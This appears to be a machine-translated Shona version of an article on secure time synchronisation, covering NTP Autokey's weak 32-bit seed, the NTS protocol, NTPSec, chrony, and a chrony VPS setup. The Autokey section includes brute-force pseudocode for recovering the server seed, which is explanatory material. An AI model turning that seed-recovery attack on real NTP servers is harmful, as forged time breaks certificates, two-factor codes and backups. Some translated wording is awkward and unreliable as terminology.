🥇Kubatanidza Nguva Kwakave Kwakachengeteka

Maitiro ekuita chokwadi chekuti nguva yega hainyepi kana uine miriyoni yakakura uye diki michina inotaurirana kuburikidza neTCP / IP? Mushure mezvose, mumwe nomumwe wavo ane wachi, uye nguva inofanira kuva yakarurama kune vose. Dambudziko iri harigone kutenderedzwa pasina ntp.

Ngatimbofungidzirai kweminiti kuti mune chimwe chikamu cheiyo maindasitiri IT zvivakwa kune matambudziko nekuyananisa masevhisi nekufamba kwenguva. Pakarepo iyo cluster stack yeEnterprise software inotanga kutadza, madomasi anoparara, masters uye Standby node vanoedza zvisingaite kudzoreredza chimiro.

Zvinogoneka zvakare kuti munhu anorwisa anoedza nemaune kukanganisa nguva kuburikidza neMiTM kana DDOS kurwisa. Mumamiriro ezvinhu akadaro, chero chinhu chinogona kuitika:

Mapassword eakaundi yevashandisi anopera;
X.509 zvitupa zvichapera;
TOTP mbiri-factor authentication icharega kushanda;
ma backups anozove echinyakare uye sisitimu inoadzima;
DNSSec ichatsemuka.

Zviri pachena kuti dhipatimendi rega rega reIT rinofarira kushanda kwakavimbika kwemasevhisi ekubatanidza nguva, uye zvingave zvakanaka kana dzakavimbika uye dzakachengeteka mukushanda kwemaindasitiri.

Dhonza NTP mumaminitsi makumi maviri nemashanu

Network protocol - mireniyumu ine imwe peculiarity, vanga vari zvechinyakare uye havachanakire chero chinhu, asi kuvatsiva hakusi nyore kunyangwe ruzhinji rwevanofarira uye mari zvaunganidzwa.

Chichemo chikuru pamusoro peNTP yekare kushaikwa kwemaitiro akavimbika ekudzivirira kubva kurwiswa nevapambi. Kuedza kwakasiyana-siyana kwakaitwa kugadzirisa dambudziko iri. Kuti tiite izvi, takatanga tashandisa pre-yakagovaniswa kiyi (PSK) nzira yekuchinjana makiyi esymmetric.

Zvinosuruvarisa, nzira iyi haina kubhadhara nechikonzero chiri nyore - haina kukwira zvakanaka. Manual configuration inodiwa padivi remutengi zvichienderana neserver. Izvi zvinoreva kuti haugone kuwedzera mumwe mutengi saizvozvo. Kana chimwe chinhu chachinja paNTP server, vatengi vese vanofanirwa kugadziridzwa.

Vakabva vauya neAutoKey, asi vakabva vaona kuwanda kwekusagadzikana mukugadzirwa kwegorgorithm pachayo uye vaifanira kuisiya. Chinhu chacho ndechekuti mbeu ine 32-bits chete, idiki zvakanyanya uye haina kukwana computational kuomarara kwekurwisa kwepamberi.

Key ID - symmetric 32-bit kiyi;
MAC (meseji yekusimbisa kodhi) - NTP packet checksum;

Autokey inoverengwa sezvinotevera.

Autokey=H(Sender-IP||Receiver-IP||KeyID||Cookie)

Iko H () iri cryptographic hash basa.

Basa rimwechete rinoshandiswa kuverenga checksum yemapakiti.

MAC=H(Autokey||NTP packet)

Zvinoitika kuti kutendeseka kwese kwepakeji cheki kunoenderana nehuchokwadi hwemakuki. Kana uchinge wava nazvo, unogona kudzoreredza autokey wobva washatisa MAC. Nekudaro, sevha yeNTP inoshandisa mbeu kana ichigadzira. Apa ndipo pane kubata.

Cookie=MSB_32(H(Client IP||Server IP||0||Server Seed))

Basa reMSB_32 rinodimbura mabhiti makumi matatu nemaviri akakosha kubva pamhedzisiro yekuverenga md5 hashi. Iyo mutengi cookie haichinji chero sevhavha paramita inoramba isina kuchinjika. Ipapo anorwisa anogona chete kudzorera nhamba yekutanga uye kukwanisa kuzvimiririra kugadzira makuki.

Kutanga, iwe unofanirwa kubatana neNTP server semutengi uye kugamuchira makuki. Mushure meizvi, uchishandisa brute force nzira, anorwisa anodzoreredza nhamba yekutanga ichitevera algorithm iri nyore.

Algorithm yekurwisa kuverenga kwenhamba yekutanga uchishandisa nzira yebrute-force.

   for i=0:2^32 − 1 do
        Ci=H(Server-IP||Client-IP||0||i)
        if Ci=Cookie then
            return i
        end if 
    end for

IP kero dzinozivikanwa, saka chasara kugadzira 2 ^ 32 hashes kudzamara kuki yakagadzirwa yafanana neyakagamuchirwa kubva kuNTP server. Pachiteshi chemba chenguva dzose neIntel Core i5, izvi zvinotora maminetsi makumi maviri nemashanu.

NTS - itsva Autokey

Zvakanga zvisingabviri kutsungirira maburi ekuchengetedza akadaro mu Autokey, uye muna 2012 yakaonekwa shanduro itsva protocol. Kuitira kukanganisa zita racho, vakasarudza kuita rebrand, saka Autokey v.2 yakanzi Network Time Security.

Iyo NTS protocol ndeyekuwedzera kweNTP chengetedzo uye parizvino inotsigira unicast mode. Iyo inopa yakasimba cryptographic dziviriro kubva pakubata kwepakeji, inodzivirira snooping, zviyero zvakanaka, inotsiga pakurasikirwa kwetiweki packet, uye inokonzeresa kushomeka kwekurasikirwa chaiko kwakaitika panguva yekubatanidza kuchengetedza.

Kubatana kweNTS kune nhanho mbiri dzinoshandisa yakaderera layer protocol. On yekutanga Panguva ino, mutengi uye sevha vanobvumirana pane akasiyana ekubatanidza ma paramita uye kuchinjanisa makuki ane makiyi ane ese anoperekedza data set. On chepiri Panguva ino, iyo chaiyo yakachengetedzwa NTS chikamu inoitika pakati pemutengi neNTP server.

NTS ine maviri akadzika-layer maprotocol: Network Nguva Chengetedzo Kiyi Kutsinhana (NTS-KE), iyo inotanga kubatana kwakachengeteka pamusoro peTLS, uye NTPv4, ichangoburwa kuumbwa kweNTP protocol. Zvimwe zvishoma pamusoro peizvi pasi apa.

Danho rekutanga - NTS KE

Panguva ino, mutengi weNTP anotanga musangano weTLS 1.2/1.3 pamusoro pekubatana kweTCP kwakasiyana neNTS KE server. Panguva yechirongwa ichi zvinotevera zvinoitika.

Mapato anosarudza maparameter AEAD algorithm yechikamu chechipiri.
Mapato anotsanangura yechipiri yakaderera-layer protocol, asi panguva ino chete NTPv4 inotsigirwa.
Iwo mapato anosarudza iyo IP kero uye chiteshi cheNTP server.
NTS KE server inoburitsa makuki pasi peNTPv4.
Iwo mapato anobvisa maviri e symmetric kiyi (C2S uye S2C) kubva kukiki zvinhu.

Iyi nzira ine mukana mukuru wekuti mutoro wese wekutumira ruzivo rwakavanzika maererano nekubatanidza paramita unowira pane yakasimbiswa uye yakavimbika TLS protocol. Izvi zvinobvisa kukosha kwekudzorerazve vhiri rako kune yakachengeteka NTP kubata maoko.

Chikamu chechipiri - NTP pasi peNTS dziviriro

Munhanho yechipiri, mutengi anoyananisa nguva neNTP server zvakachengeteka. Nechinangwa ichi, inotumira mana akakosha ekuwedzera (minda yekuwedzera) muNTPv4 packet chimiro.

Iyo Unique Identifier Extension ine yakasarudzika nonce kudzivirira kurwiswa kwereplay.
NTS Cookie Extension ine imwe yeNTP makuki anowanikwa kune mutengi. Sezvo chete mutengi ane C2S uye S2C symmetric AAED makiyi, sevha yeNTP inofanirwa kuabvisa kubva kukiki.
NTS Cookie Placeholder Extension inzira yekuti mutengi akumbire mamwe makuki kubva kuseva. Iyi yekuwedzera inofanirwa kuve nechokwadi chekuti NTP server mhinduro haina kureba kupfuura chikumbiro. Izvi zvinobatsira kudzivirira amplification kurwisa.
NTS Authenticator uye Encrypted Extension Fields Extension ine AAED cipher ine C2S kiyi, NTP musoro, timestamps, uye EF iri pamusoro se data inoperekedza. Pasina iyi yekuwedzera zvinokwanisika kukanganisa timestamps.

Pakugamuchira chikumbiro kubva kumutengi, sevha inosimbisa chokwadi cheNTP packet. Kuti aite izvi, anofanirwa decrypt makuki, kubvisa iyo AAED algorithm uye makiyi. Mushure mekubudirira kutarisa pakiti yeNTP yechokwadi, sevha inopindura mutengi nenzira inotevera.

Unique Identifier Extension ikopi yegirazi yechikumbiro chemutengi, chiyero chinopesana nekurwisa kurwiswa.
NTS Cookie Extension mamwe makuki kuti uenderere mberi nechikamu.
NTS Authenticator uye Encrypted Extension Fields Extension ine AEAD cipher ine S2C kiyi.

Kukwazisana kwechipiri kunogona kudzokororwa kakawanda, nekupfuura nhanho yekutanga, sezvo chikumbiro chega chega uye mhinduro inopa mutengi mamwe makuki. Izvi zvine mukana wekuti mashandiro eTLS ekushandisa komputa uye kutumira PKI data akakamurwa nenhamba yezvikumbiro zvinodzokororwa. Izvi zvinonyanya kukodzera kune nyanzvi dzeFPGA vanochengeta nguva, apo ese makuru mashandiro anogona kuiswa mumabasa akati wandei kubva kumunda we symmetric cryptography, kuendesa iyo yese TLS stack kune imwe mudziyo.

NTPSec

Chii chakakosha nezveNTP? Pasinei nenyaya yekuti munyori wepurojekiti, Dave Mills, akaedza kunyora kodhi yake zvakanyanya sezvinobvira, inyanzvi isingawanzo gadziriso inozokwanisa kunzwisisa kuomesesa kweiyo nguva synchronization algorithms ane makore makumi matatu nemashanu. Imwe kodhi yakanyorwa nguva yePOSIX isati yasvika, uye Unix API ipapo yakanga yakasiyana zvakanyanya nezviri kushandiswa nhasi. Pamusoro pezvo, ruzivo rwenhamba runodiwa kubvisa chiratidzo kubva pakukanganisa pamitsara ine ruzha.

NTS yanga isiri yekutanga kuedza kugadzirisa NTP. Kamwe varwisi vakadzidza kushandisa kusazvibata kweNTP kukwidziridza kurwiswa kweDDoS, zvakava pachena kuti shanduko huru dzaidiwa. Uye apo zvinyorwa zveNTS zvanga zvichigadzirirwa nekupedzwa, US National Science Foundation pakupera kwa2014 yakakurumidza kugovera rubatsiro rwekuvandudza NTP.

Boka rekushanda rakanga richitungamirwa kwete nemunhu wese, asi Eric Stephen Raymond - mumwe wevatangi uye mbiru dzeOpen Source nharaunda uye munyori webhuku Cathedral uye Bazaar. Chinhu chekutanga Eric neshamwari dzake vakaedza kuita kufambisa kodhi yeNTP kubva paBitKeeper papuratifomu kuenda kugit, asi hazvina kushanda saizvozvo. Mutungamiri weProjekiti Harlan Stenn aipesana nesarudzo iyi uye nhaurirano dzakamira. Zvadaro zvakasarudzwa kuforoma kodhi yeprojekti, uye NTPSec yakazvarwa.

Chiitiko chakasimba, chinosanganisira kushanda paGPSD, masvomhu uye hunyanzvi hwemashiripiti ekuverenga kodhi yekare - Eric Raymond ndiye chaiye mubiki aigona kubvisa chirongwa chakadaro. Chikwata chakawana nyanzvi yekufambisa kodhi uye mumavhiki gumi chete NTP settledpaGitLab. Basa rakanga rava kufamba.

Chikwata chaEric Raymond chakatora basa nenzira imwechete iyo Auguste Rodin akaita nebhuroko redombo. Nekubvisa 175 KLOC yekodhi yekare, vakakwanisa kuderedza zvakanyanya nzvimbo yekurwisa nekuvhara maburi akawanda ekuchengetedza.

Heino rondedzero isina kukwana yeavo vanosanganisirwa mukugovera:

Zvisina kunyorwa, zvechinyakare, zvechinyakare kana zvakatyoka refclock.
Isati yashandiswa ICS raibhurari.
libopts/autogen.
Kodhi yekare yeWindows.
ntpdc.
Autokey.
Iyo ntpq C kodhi yakanyorwazve muPython.
Iyo sntp/ntpdig C kodhi yakanyorwazve muPython.

Mukuwedzera pakuchenesa kodhi, purojekiti yakanga ine mamwe mabasa. Heino runyorwa rwezvavakabudirira:

Kudzivirirwa kwekodhi kubva pakuputika kwebhafa kwakagadziridzwa zvakanyanya. Kuti udzivise kuwanda kwebuffer, ese asina kuchengetedzeka tambo mabasa (strcpy/strcat/strtok/sprintf/vsprintf/gets) akatsiviwa neshanduro dzakachengeteka dzinoshandisa buffer size limits.
Yakawedzerwa NTS rutsigiro.
Yakavandudzwa nguva nhanho kunyatsoita kagumi nekubatanidza zvinhu zvemuviri. Izvi zvinokonzerwa nekuti wachi dzemazuva ano dzemakombuta dzave dzakarurama kupfuura idzo pakazvarwa NTP. Vakanyanya kubatsirwa pane izvi vaive GPSDO uye yakatsaurirwa nguva redhiyo.
Huwandu hwemitauro yehurongwa hwakaderedzwa kusvika maviri. Panzvimbo pePerl, awk uye kunyange S zvinyorwa, ikozvino zvese Python. Nekuda kweizvi, kune mikana yakawanda yekushandisazve kodhi.
Panzvimbo yema noodles e autotools scripts, chirongwa chakatanga kushandisa software kuvaka system waf.
Yakagadziridzwa uye yakarongwa patsva mapepa eprojekiti. Kubva pane zvinopokana uye dzimwe nguva muunganidzwa wezvinyorwa zvekare, vakagadzira zvinyorwa zvinogoneka. Yese yekuraira mutsara switch uye yega yekumisikidza entity ikozvino ine imwe vhezheni yechokwadi. Pamusoro pezvo, mapeji emunhu uye zvinyorwa zvewebhu zvave kugadzirwa kubva kune mamwe epakati mafaera.

NTPSec inowanikwa kune akati wandei Linux kugoverwa. Parizvino, yazvino yakagadzikana vhezheni ndeye 1.1.8, yeGentoo Linux ndiyo yekupedzisira.

(1:696)$ sudo emerge -av ntpsec
These are the packages that would be merged, in order:
Calculating dependencies... done!
[ebuild   R    ] net-misc/ntpsec-1.1.7-r1::gentoo  USE="samba seccomp -debug -doc -early -gdb -heat -libbsd -nist -ntpviz -rclock_arbiter -rclock_generic -rclock_gpsd -rclock_hpgps -rclock_jjy -rclock_local -rclock_modem -rclock_neoclock -rclock_nmea -rclock_oncore -rclock_pps -rclock_shm -rclock_spectracom -rclock_trimble -rclock_truetime -rclock_zyfer -smear -tests" PYTHON_TARGETS="python3_6" 0 KiB
Total: 1 package (1 reinstall), Size of downloads: 0 KiB
Would you like to merge these packages? [Yes/No]

Chrony

Paive neimwe kuyedza kutsiva iyo NTP yekare neimwe yakachengeteka. Chrony, kusiyana neNTPSec, yakanyorwa kubva pasi uye yakagadzirirwa kushanda zvakavimbika pasi pemamiriro ezvinhu akasiyana-siyana, kusanganisira kusagadzikana kwehutano hwemambure, kuwanikwa kwechikamu chetiweki kana kusangana, uye kuchinja kwekushisa. Mukuwedzera, chrony ine zvimwe zvakanakira:

chrony inogona kuwiriranisa iyo system wachi nekukurumidza nekurongeka kukuru;
chrony idiki, inoshandisa ndangariro shoma, uye inowana iyo CPU chete kana ichidikanwa. Uku ndiko kuwedzera kukuru kwekuchengetedza zviwanikwa uye simba;
chrony inotsigira hardware timestamps paLinux, ichibvumira kuwiriranisa kwakanyatso kurongeka pamanetiweki emuno.

Nekudaro, chrony inoshaya zvimwe zvezvinhu zveNTP yekare, senhepfenyuro uye multicast mutengi / server. Uye zvakare, yekirasi NTP inotsigira yakakura nhamba yeanoshanda masisitimu uye mapuratifomu.

Kudzima kushanda kwesevha uye zvikumbiro zveNTP kune chronyd process, ingonyora port 0 mu chrony.conf faira. Izvi zvinoitwa mumamiriro ezvinhu apo pasina chikonzero chekuchengetedza nguva yeNTP vatengi kana vezera. Kubva vhezheni 2.0, iyo NTP server chiteshi inovhurwa chete kana kupinda kuchibvumidzwa nemvumo yekuraira kana yakakodzera kuraira, kana NTP peer inogadziriswa, kana dhiraivha yekutepfenyura inoshandiswa.

Iyo purogiramu ine ma modules maviri.

chronyd ibasa rinomhanya kumashure. Iyo inogamuchira ruzivo nezve musiyano pakati peiyo system wachi uye yekunze nguva server uye inogadzirisa nguva yemuno. Iyo zvakare inoshandisa iyo NTP protocol uye inogona kuita semutengi kana sevha.
chronyc ndeye command line utility yekutarisa chirongwa uye kutonga. Inoshandiswa kukwenenzvera akasiyana masevhisi paramita, semuenzaniso inokubvumidza kuti uwedzere kana kubvisa maseva eNTP uku chronyd ichienderera mberi.

Kubva vhezheni 7 yeRedHat Linux anoshandisa chrony sevhisi yekuyananisa nguva. Iyo package inowanikwawo kune mamwe maLinux kugoverwa. Iyo yazvino yakagadzikana vhezheni ndeye 3.5, kugadzirira kuburitswa kwev4.0.

(1:712)$ sudo emerge -av chrony
These are the packages that would be merged, in order:
Calculating dependencies... done!
[binary  N     ] net-misc/chrony-3.5-r2::gentoo  USE="adns caps cmdmon ipv6 ntp phc readline refclock rtc seccomp (-html) -libedit -pps (-selinux)" 246 KiB
Total: 1 package (1 new, 1 binary), Size of downloads: 246 KiB
Would you like to merge these packages? [Yes/No]

Maitiro ekumisikidza yako wega kure chrony server paInternet kuwiriranisa nguva pane network yehofisi. Pazasi pane muenzaniso wekugadzira VPS.

Muenzaniso wekumisikidza Chrony paRHEL / CentOS paVPS

Ngatidzidzisei zvishoma uye kumisikidza yedu NTP server paVPS. Zviri nyore kwazvo, ingosarudza mutero wakakodzera pane iyo RuVDS webhusaiti, tora yakagadzirira-yakagadzirwa sevha uye nyora gumi nemaviri mirairo iri nyore. Nezvinangwa zvedu, iyi sarudzo yakanyatsokodzera.

Ngatienderere mberi nekumisikidza sevhisi uye tanga taisa iyo chrony package.

[root@server ~]$ yum install chrony

RHEL 8 / CentOS 8 shandisa akasiyana pasuru maneja.

[root@server ~]$ dnf install chrony

Mushure mekuisa chrony, unofanirwa kutanga uye kumisa sevhisi.

[root@server ~]$ systemctl enable chrony --now

Kana uchida, unogona kuita shanduko ku/etc/chrony.conf, uchitsiva maseva eNPT neaya ari pedyo kuti aderedze nguva yekupindura.

# Use public servers from the pool.ntp.org project.
# Please consider joining the pool (http://www.pool.ntp.org/join.html).
server 0.ru.pool.ntp.org iburst
server 1.ru.pool.ntp.org iburst
server 2.ru.pool.ntp.org iburst
server 3.ru.pool.ntp.org iburst

Tevere, isu tinomisa kuwiriranisa kweNTP server nemanodhi kubva padziva rakatarwa.

[root@server ~]$ timedatectl set-ntp true
[root@server ~]$ systemctl restart chronyd.service

Izvo zvinodikanwa zvakare kuvhura iyo NTP chiteshi kune kunze, zvikasadaro firewall inovharira inopinda inobatana kubva kune vatengi node.

[root@server ~]$ firewall-cmd --add-service=ntp --permanent 
[root@server ~]$ firewall-cmd --reload

Padivi remutengi, zvakakwana kuseta nguva yenguva nenzira kwayo.

[root@client ~]$ timedatectl set-timezone Europe/Moscow

Iyo /etc/chrony.conf faira inotsanangudza IP kana zita rekutambira reVPS yedu server inoshandisa NTP server chrony.

server my.vps.server

Uye pakupedzisira, kutanga nguva kuwiriranisa pane mutengi.

[root@client ~]$ systemctl enable --now chronyd
[root@client ~]$ timedatectl set-ntp true

Nguva inotevera ini ndichakuudza kuti ndedzipi sarudzo dziripo dzekuwiriranisa nguva pasina Internet.

Source: www.habr.com

Kuti kuwiriranisa nguva kwakave kwakachengeteka sei